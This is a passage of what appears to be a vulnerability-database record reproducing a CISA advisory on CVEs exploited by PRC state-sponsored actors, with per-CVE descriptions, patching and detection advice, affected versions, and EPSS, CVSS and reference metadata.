(Critical) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft has released security updates for Windows Exchange Server. To exploit these vulnerabilities, an authenticated malicious actor could send malicious requests to an affected server. A malicious actor who successfully exploited these vulnerabilities would execute arbitrary code and compromise the affected systems. If successfully exploited, these vulnerabilities could allow an adversary to obtain access to sensitive information, bypass security restrictions, cause a denial of service conditions, and/or perform unauthorized actions on the affected Exchange server, which could aid in further malicious activity. \n \n_Recommended Mitigations_\n\n * Apply the appropriate Microsoft Security Update.\n * Microsoft Exchange Server 2013 Cumulative Update 23 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 18 (KB5000871)\n * Microsoft Exchange Server 2016 Cumulative Update 19 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 7 (KB5000871)\n * Microsoft Exchange Server 2019 Cumulative Update 8 (KB5000871)\n * Restrict untrusted connections. \n \n_Detection Methods_\n\n * Analyze Exchange product logs for evidence of exploitation.\n * Scan for known webshells. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange 2013, 2016, and 2019. \n \n_Table VII: F5 CVE-2020-5902_\n\nF5 CVE-2020-5902 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. \n \n_Recommended Mitigations_\n\n * Apply FY BIG-IP Update.\n * Restrict access to the configuration utility. \n \n_Detection Methods_\n\n * Use F5\u2019s [CVE-2020-5902 IoC Detection Tool](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>).\n * Additional detection methods can be found at <https://support.f5.com/csp/article/K52145254>. \n \n_Vulnerable Technologies and Versions_\n\nF5 Big-IP Access Policy Manager\n\nF5 Big-IP Advanced Firewall Manager\n\nF5 Big-IP Advanced Web Application Firewall\n\nF5 Big-IP Analytics\n\nF5 Big-IP Application Acceleration Manager\n\nF5 Big-IP Application Security Manager\n\nF5 Big-IP Ddos Hybrid Defender\n\nF5 Big-IP Domain Name System (DNS)\n\nF5 Big-IP Fraud Protection Service (FPS)\n\nF5 Big-IP Global Traffic Manager (GTM)\n\nF5 Big-IP Link Controller\n\nF5 Networks Big-IP Local Traffic Manager (LTM)\n\nF5 Big-IP Policy Enforcement Manager (PEM)\n\nF5 SSL Orchestrator \n \n_References_\n\n<https://support.f5.com/csp/article/K00091341>\n\n<https://support.f5.com/csp/article/K07051153>\n\n<https://support.f5.com/csp/article/K20346072>\n\n<https://support.f5.com/csp/article/K31301245>\n\n<https://support.f5.com/csp/article/K33023560>\n\n<https://support.f5.com/csp/article/K43638305>\n\n<https://support.f5.com/csp/article/K52145254>\n\n<https://support.f5.com/csp/article/K82518062> \n \n_Table VIII: VMware CVE-2021-22005_\n\nVMware CVE-2021-22005 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThe vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. \n \n_Recommended Mitigations_\n\n * Apply Vendor Updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVMware Cloud Foundation\n\nVMware VCenter Server \n \n_Table IX: Citrix CVE-2019-19781_\n\nCitrix CVE-2019-19781 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. \n \n_Recommended Mitigations_\n\n * Apply vendor [mitigations](<https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781>).\n * Use the CTX269180 - [CVE-2019-19781 Verification Tool](<https://support.citrix.com/article/CTX269180/cve201919781-verification-tool>) provided by Citrix. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nCitrix ADC, Gateway, and SD-WAN WANOP \n \n_Table X: Cisco CVE-2021-1497_\n\nCisco CVE-2021-1497 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nMultiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote malicious actor to perform a command injection against an affected device. For more information about these vulnerabilities, see the Technical details section of this advisory. \n \n_Recommended Mitigations_\n\n * Apply Cisco software updates. \n \n_Detection Methods_\n\n * Look at the Snort [Rules](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details>) provided by Cisco. \n \n_Vulnerable Technologies and Versions_\n\nCisco Hyperflex Hx Data Platform 4.0(2A) \n \n_Table XI: Buffalo CVE-2021-20090_\n\nBuffalo CVE-2021-20090 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote malicious actors to bypass authentication. \n \n_Recommended Mitigations_\n\n * Update firmware to latest available version. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nBuffalo Wsr-2533Dhpl2-Bk Firmware\n\nBuffalo Wsr-2533Dhp3-Bk Firmware \n \n_Table XII: Atlassian CVE-2021-26084_\n\nAtlassian CVE-2021-26084 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nIn affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated malicious actor to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23 and from version 6.14.0 before 7.4.11, version 7.5.0 before 7.11.6, and version 7.12.0 before 7.12.5. \n \n_Recommended Mitigations_\n\n * Update confluence version to 6.13.23, 7.4.11, 7.11.6, 7.12.5, and 7.13.0.\n * Avoid using end-of-life devices.\n * Use Intrusion Detection Systems (IDS). \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nAtlassian Confluence\n\nAtlassian Confluence Server\n\nAtlassian Data Center\n\nAtlassian Jira Data Center \n \n_Table XIII: Hikvision CVE-2021-36260_\n\nHikvision CVE-2021-36260 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A command injection vulnerability exists in the web server of some Hikvision products. Due to the insufficient input validation, a malicious actor can exploit the vulnerability to launch a command injection by sending some messages with malicious commands. \n \n_Recommended Mitigations_\n\n * Apply the latest firmware updates. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nVarious Hikvision Firmware to include Ds, Ids, and Ptz \n \n_References_\n\n<https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260> \n \n_Table XIV: Sitecore CVE-2021-42237_\n\nSitecore CVE-2021-42237 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nSitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve remote command execution on the machine. No authentication or special configuration is required to exploit this vulnerability. \n \n_Recommended Mitigations_\n\n * Update to latest version.\n * Delete the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx. \n \n_Detection Methods_\n\n * N/A \n \n_Vulnerable Technologies and Versions_\n\nSitecore Experience Platform 7.5, 7.5 Update 1, and 7.5 Update 2\n\nSitecore Experience Platform 8.0, 8.0 Service Pack 1, and 8.0 Update 1-Update 7\n\nSitecore Experience Platform 8.0 Service Pack 1\n\nSitecore Experience Platform 8.1, and Update 1-Update 3\n\nSitecore Experience Platform 8.2, and Update 1-Update 7 \n \n_Table XV: F5 CVE-2022-1388_\n\nF5 CVE-2022-1388 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. \n \n_Recommended Mitigations_\n\n * Block iControl REST access through the self IP address.\n * Block iControl REST access through the management interface.\n * Modify the BIG-IP httpd configuration. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nBig IP versions:\n\n16.1.0-16.1.2\n\n15.1.0-15.1.5\n\n14.1.0-14.1.4\n\n13.1.0-13.1.4\n\n12.1.0-12.1.6\n\n11.6.1-11.6.5 \n \n_Table XVI: Apache CVE-2022-24112_\n\nApache CVE-2022-24112 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nA malicious actor can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed. \n \n_Recommended Mitigations_\n\n * In affected versions of Apache APISIX, you can avoid this risk by explicitly commenting out batch-requests in the conf/config.yaml and conf/config-default.yaml files and restarting Apache APISIX.\n * Update to 2.10.4 or 2.12.1. \n \n_Detection Methods_\n\nN/A \n \n_Vulnerable Technologies and Versions_\n\nApache APISIX between 1.3 and 2.12.1 (excluding 2.12.1)\n\nLTS versions of Apache APISIX between 2.10.0 and 2.10.4 \n \n_Table XVII: ZOHO CVE-2021-40539_\n\nZOHO CVE-2021-40539 CVSS 3.0: 9.8 (Critical) \n \n--- \n \n_Vulnerability Description_\n\nZoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution. \n \n_Recommended Mitigations_\n\n * Upgrade to latest version. \n \n_Detection Methods_\n\n * Run ManageEngine\u2019s detection tool.\n * Check for specific files and [logs](<https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html>). \n \n_Vulnerable Technologies and Versions_\n\nZoho Corp ManageEngine ADSelfService Plus \n \n_Table XVIII: Microsoft CVE-2021-26857_\n\nMicrosoft CVE-2021-26857 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: https://github.com/microsoft/CSS-Exchange/tree/main/Security.\n * Hashes can be found here: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XIX: Microsoft CVE-2021-26858_\n\nMicrosoft CVE-2021-26858 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_Table XX: Microsoft CVE-2021-27065_\n\nMicrosoft CVE-2021-27065 CVSS 3.0: 7.8 (High) \n \n--- \n \n_Vulnerability Description_\n\nMicrosoft Exchange Server remote code execution vulnerability. This CVE ID differs from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078. \n \n_Recommended Mitigations_\n\n * Update to support latest version.\n * Install Microsoft security patch.\n * Use Microsoft Exchange On-Premises Mitigation Tool. \n \n_Detection Methods_\n\n * Run Exchange script: <https://github.com/microsoft/CSS-Exchange/tree/main/Security>.\n * Hashes can be found here: <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log>. \n \n_Vulnerable Technologies and Versions_\n\nMicrosoft Exchange Servers \n \n_References_\n\n<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065> \n \n_Table XXI: Apache CVE-2021-41773_\n\nApache CVE-2021-41773 CVSS 3.0: 7.5 (High) \n \n--- \n \n_Vulnerability Description_\n\nThis vulnerability has been modified since it was last analyzed by NVD. It is awaiting reanalysis, which may result in further changes to the information provided. A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. A malicious actor could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied,\" these requests can succeed. Enabling CGI scripts for these aliased paths could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 is incomplete (see CVE-2021-42013). \n \n_Recommended Mitigations_\n\n * Apply update or patch. \n \n_Detection Methods_\n\n * Commercially available scanners can detect CVE. \n \n_Vulnerable Technologies and Versions_\n\nApache HTTP Server 2.4.49 and 2.4.50\n\nFedoraproject Fedora 34 and 35\n\nOracle Instantis Enterprise Track 17.1-17.3\n\nNetapp Cloud Backup \n \n### Revisions\n\nInitial Publication: October 6, 2022\n", "published": "2022-10-06T12:00:00", "modified": "2022-10-06T12:00:00", "epss": [{"cve": "CVE-2019-11510", "epss": 0.97334, "percentile": 0.99806, "modified": "2023-06-13"}, {"cve": "CVE-2019-19781", "epss": 0.97475, "percentile": 0.99939, "modified": "2023-06-13"}, {"cve": "CVE-2020-5902", "epss": 0.97567, "percentile": 0.99998, "modified": "2023-06-06"}, {"cve": "CVE-2021-1497", "epss": 0.97462, "percentile": 0.99923, "modified": "2023-05-27"}, {"cve": "CVE-2021-20090", "epss": 0.97409, "percentile": 0.99872, "modified": "2023-05-27"}, {"cve": "CVE-2021-22005", "epss": 0.97416, "percentile": 0.99877, "modified": "2023-05-27"}, {"cve": "CVE-2021-22205", "epss": 0.97438, "percentile": 0.99898, "modified": "2023-05-27"}, {"cve": "CVE-2021-26084", "epss": 0.97488, "percentile": 0.99947, "modified": "2023-05-27"}, {"cve": "CVE-2021-26412", "epss": 0.01674, "percentile": 0.85813, "modified": "2023-05-27"}, {"cve": "CVE-2021-26854", "epss": 0.01674, "percentile": 0.85813, "modified": "2023-05-27"}, {"cve": "CVE-2021-26855", "epss": 0.97534, "percentile": 0.99983, "modified": "2023-05-27"}, {"cve": "CVE-2021-26857", "epss": 0.42647, "percentile": 0.96776, "modified": "2023-05-27"}, {"cve": "CVE-2021-26858", "epss": 0.45994, "percentile": 0.96865, "modified": "2023-05-27"}, {"cve": "CVE-2021-27065", "epss": 0.92531, "percentile": 0.98484, "modified": "2023-05-27"}, {"cve": "CVE-2021-27078", "epss": 0.01674, "percentile": 0.85813, "modified": "2023-05-27"}, {"cve": "CVE-2021-36260", "epss": 0.97497, "percentile": 0.99955, "modified": "2023-05-23"}, {"cve": "CVE-2021-40539", "epss": 0.97519, "percentile": 0.99972, "modified": "2023-05-23"}, {"cve": "CVE-2021-41773", "epss": 0.97528, "percentile": 0.99977, "modified": "2023-05-23"}, {"cve": "CVE-2021-42013", "epss": 0.97492, "percentile": 0.99958, "modified": "2023-09-08"}, {"cve": "CVE-2021-42237", "epss": 0.97546, "percentile": 0.9999, "modified": "2023-05-23"}, {"cve": "CVE-2021-44228", "epss": 0.97565, "percentile": 0.99997, "modified": "2023-05-23"}, {"cve": "CVE-2022-1388", "epss": 0.97518, "percentile": 0.99972, "modified": "2023-06-17"}, {"cve": "CVE-2022-24112", "epss": 0.96921, "percentile": 0.99559, "modified": "2023-06-14"}, {"cve": "CVE-2022-26134", "epss": 0.97537, "percentile": 0.99987, "modified": "2023-08-11"}, {"cve": "CVE-2022-42475", "epss": 0.42232, "percentile": 0.96784, "modified": "2023-06-03"}, {"cve": "CVE-2022-47966", "epss": 0.97184, "percentile": 0.99688, "modified": "2023-06-03"}], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "reporter": "Industrial Control Systems Cyber Emergency Response Team", "references": ["https://www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a&title=Top%20CVEs%20Actively%20Exploited%20By%20People%E2%80%99s%20Republic%20of%20China%20State-Sponsored%20Cyber%20Actors", "https://twitter.com/intent/tweet?text=Top%20CVEs%20Actively%20Exploited%20By%20People%E2%80%99s%20Republic%20of%20China%20State-Sponsored%20Cyber%20Actors+https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "https://www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "mailto:?subject=Top%20CVEs%20Actively%20Exploited%20By%20People%E2%80%99s%20Republic%20of%20China%20State-Sponsored%20Cyber%20Actors&body=https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "https://www.cisa.gov/uscert/china", "https://www.ic3.gov/Home/IndustryAlerts", "https://www.nsa.gov/Press-Room/Cybersecurity-Advisories-Guidance/", "https://media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF", "https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3055748/nsa-cisa-and-fbi-expose-prc-state-sponsored-exploitation-of-network-providers-d/", "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/", "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html", "https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/", "https://support.f5.com/csp/article/K52145254", "https://support.f5.com/csp/article/K00091341", "https://support.f5.com/csp/article/K07051153", "https://support.f5.com/csp/article/K20346072", "https://support.f5.com/csp/article/K31301245", "https://support.f5.com/csp/article/K33023560", "https://support.f5.com/csp/article/K43638305", "https://support.f5.com/csp/article/K52145254", "https://support.f5.com/csp/article/K82518062", "https://support.citrix.com/article/CTX267679/mitigation-steps-for-cve201919781", "https://support.citrix.com/article/CTX269180/cve201919781-verification-tool", "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-rce-TjjNrkpR#details", "https://www.cisa.gov/uscert/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260", "https://www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html", "https://github.com/microsoft/CSS-Exchange/tree/main/Security", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log", "https://github.com/microsoft/CSS-Exchange/tree/main/Security", "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/#scan-log", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27065", "https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-279a", "https://www.facebook.com/CISA", "https://twitter.com/CISAgov", "https://www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency", "https://www.youtube.com/@cisagov", "https://www.instagram.com/cisagov", "https://www.dhs.gov/accessibility", "https://www.dhs.gov/performance-financial-reports", "https://www.dhs.gov", "https://www.dhs.gov/foia", "https://www.oig.dhs.gov/", "https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138", "https://www.whitehouse.gov/", "https://www.usa.gov/"], "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134", "CVE-2022-42475", "CVE-2022-47966"], "immutableFields": [], "lastseen": "2023-09-09T20:52:48", "viewCount": 60, "enchantments": {"dependencies": {"references": [{"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:4A411E7E1CF65A8662ABD43534726FEF", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:6B355C8FD4C2D8E5A670002BC4BD9497", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:72129348AFF386C88DD2D4145C64F678", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:99D943E3269E3EABFC3348509D099BA8", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-41773", "ALPINE:CVE-2021-42013"]}, {"type": "altlinux", "idList": ["246E8470C52602631D420B594DFDCCEA", "480D6FAD92A6FBB928DBF958DAEFAAB5", "79A831EBFBCA72482FEB10540EF33017", "8D304F37C70C609A33E435A50BE15292"]}, {"type": "amazon", "idList": ["ALAS-2021-1543", "ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1716", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425"]}, {"type": "archlinux", "idList": ["ASA-202104-1", "ASA-202110-1"]}, {"type": "arista", "idList": ["ARISTA:0070"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CONFSERVER-79000", "CONFSERVER-79016", "CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:12F253E0-F6F2-4628-A989-57A36E8C7026", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:1D0445C7-C9A7-44D8-BC02-6610FBEF828F", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:288E3CA7-1388-488A-81D9-E93EDFFAA221", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:2B7B662B-EDD1-4BFA-978A-6AE63790F8A5", "AKB:300897EA-9C15-4FC4-9EDE-D9FF9DF626F6", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:41DB8118-B27F-4492-8132-F2D75D5111D4", "AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:4C6505D4-093E-4594-BF95-C77BDD5E3D81", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:5E0101D5-FC29-4F97-9C2B-72A975223898", "AKB:61971866-F0B5-4317-8AF4-C4E4C23279F1", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:77557E97-8311-4C07-B6B7-5AE38B6A1069", "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:7FE6C007-8804-443F-9C09-A709C49B05F1", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:84F3B5A8-D839-4F1A-9130-A0C5D4B74057", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:AA680CD3-76EC-4846-9C49-ADBE618F13BA", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70", "AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1", "AKB:E9596BCB-BC29-4F41-9350-220EBD59D69D", "AKB:EB86163A-D6FE-4561-8D2C-40CE96FB9F2F", "AKB:EBC58F49-1AB2-4D9F-8147-A97243DA8244", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F05BE8C2-C144-45BE-BF46-5867A2CAAF15", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:14D436977A1AFE4725A5CA01B44E33E9", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:99215B2D7808C46D8762AD712CD3D267", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:E820C062BC9959711E1D1152D8848072", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712"]}, {"type": "cert", "idList": ["VU:290915", "VU:619785", "VU:914124", "VU:927237", "VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1097", "CPAI-2019-1653", "CPAI-2020-0628", "CPAI-2021-0099", "CPAI-2021-0107", "CPAI-2021-0198", "CPAI-2021-0416", "CPAI-2021-0497", "CPAI-2021-0548", "CPAI-2021-0728", "CPAI-2021-0749", "CPAI-2021-0867", "CPAI-2021-0879", "CPAI-2021-0894", "CPAI-2021-0936", "CPAI-2021-1025", "CPAI-2022-0067", "CPAI-2022-0284", "CPAI-2022-0297"]}, {"type": "checkpoint_security", "idList": ["CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:134C272F26FB005321448C648224EB02", "CISA:16DE226AFC5A22020B20927D63742D98", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:28C7B30B096401B3117E4D6288853BD7", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:3219D2E89DB1680D9EF6F22691FC5829", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:71FB648030101FA9B007125DFA636193", "CISA:76FE595B1B89D06301E16CB8087D39BD", "CISA:78B08801DAA7C3B8A2D34A5790730C76", "CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:8809AF4B96861275A43448FB64E686D1", 